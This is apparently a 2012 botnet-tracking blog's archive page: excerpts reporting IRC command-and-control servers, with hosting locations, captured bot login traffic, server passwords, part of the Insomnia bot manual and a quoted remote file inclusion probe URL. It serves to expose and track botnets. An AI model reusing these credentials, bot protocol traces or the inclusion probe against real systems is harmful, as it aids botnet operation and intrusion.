Month: April 2012 Bot hosted in Mexico Television Internacional S.a. De C.v)

Resolved : [] To [] Remote Host Port Number 6667 Local users: Current Local Users: 74 Max: 115 Global users: Current Global Users: 74 Max: 90 JOIN #bots none NICK New{US-XP-x86}7358801 USER 7358801 “” “7358801” :7358801 MODE New{US-XP-x86}7358801 +iMm PONG :4D23E0D9 PONG Now talking in #bots Modes On: [ #bots 12] [ + botnet hosted in United States Baltimore Gandi Us Inc)

Same hecker Burimi from here Resolved : [] To [] Resolved : [] To [] Resolved : [] To [] Remote Host Port Number 4042 PASS ngrBot 1863 PASS ngrBot other ports used for ircd: 81,3333,1234,33333 NICK new[USA|XP|COMPUTERNAME]eejxdfy USER xd “” “lol” :xd Channels: Now talking in #boss Topic On: [ #boss hosted in United States Denver Wbs Connect)

Resolved : [] To [] Remote Host Port Number 80 80 80 8879 PASS secret NICK n{US|XPa}wjipllb USER wjipllb 0 0 :wjipllb JOIN #ircp secret PRIVMSG #ircp :[d=”” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 PRIVMSG #ircp :[DNS]: Blocked 0 domain(s) – Redirected 8 domain(s) hosted in Germany Frankfurt Leaseweb Germany Gmbh)

Another post from same guy here Samples here: password: virus Control Panel: Control Panel Url Loader.exe is a .net http bot, that connects to Used for ddosing and loading malware (mainly RATS). Most files to be installed are loaded from Packet captures of it in action Credits to our bot hosted in Netherland Amsterdam Ecatel Ltd)

A guy posted in this thread about another Insomnia botnet server u can read in comments for more Resolved : [] To [] Bv1’s insomnia bot server Server ssl required to connect. use xchat or install it on mirc accept his invalid certificate Port 443 Password fuckyou To conect do this /server

INSOMNIA IRC Bot v1.1.3 Manual

Insomnia is another irc bot sold in hecking forums coded in .NET I m posting the manual here so u can see what it does INSOMNIA v1.1.3 Table of Contents 1. Summary 2. Core Features 3. Malware Removal 4. SOCKS5 5. DDoS 6. Spreading Modules 7. Topic Generator Explained 8. Complete command list Summary Insomnia bots hosted in Germany Nuremberg Hetzner Online Ag)

Resolved : [] To [] Remote Host Port Number 18967 NICK USA|00|XP|SP2|1884237 USER fhfrlaam 0 0 :USA|00|XP|SP2|1884237 USERHOST USA|00|XP|SP2|1884237 MODE USA|00|XP|SP2|1884237 -x+i JOIN ##&crackr0x#&## 1@$$smoqueed@@ NICK USA|00|XP|SP2|0441020 USER zfoxtlp 0 0 :USA|00|XP|SP2|0441020 USERHOST USA|00|XP|SP2|0441020 MODE USA|00|XP|SP2|0441020 -x+i NICK USA|00|XP|SP2|5607084 USER ucxoiuauh 0 0 :USA|00|XP|SP2|5607084 USERHOST USA|00|XP|SP2|5607084 MODE USA|00|XP|SP2|5607084 -x+i NICK USA|00|XP|SP2|5062754 USER oqqeofyr 0 botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)

Remote Host Port Number 5900 other domains: NICK [USA][XP-SP2]669217 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY2742 JOIN ##Turb0-37## NICK [USA][XP-SP2]062388 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY7011 NICK {NOVA}[USA][XP-SP2]750366 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY0938 hosting infos: noobs scaning for RFI)

i was looking for online users in my vbulletin site and i saw this : /threads//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= i downloaded apache.jpg and i found that is a lame pBot directing to here i found the lamer behind all this :-=[ HackeD by PasteL ]=- here is the chanel used for rfi scan Now talking in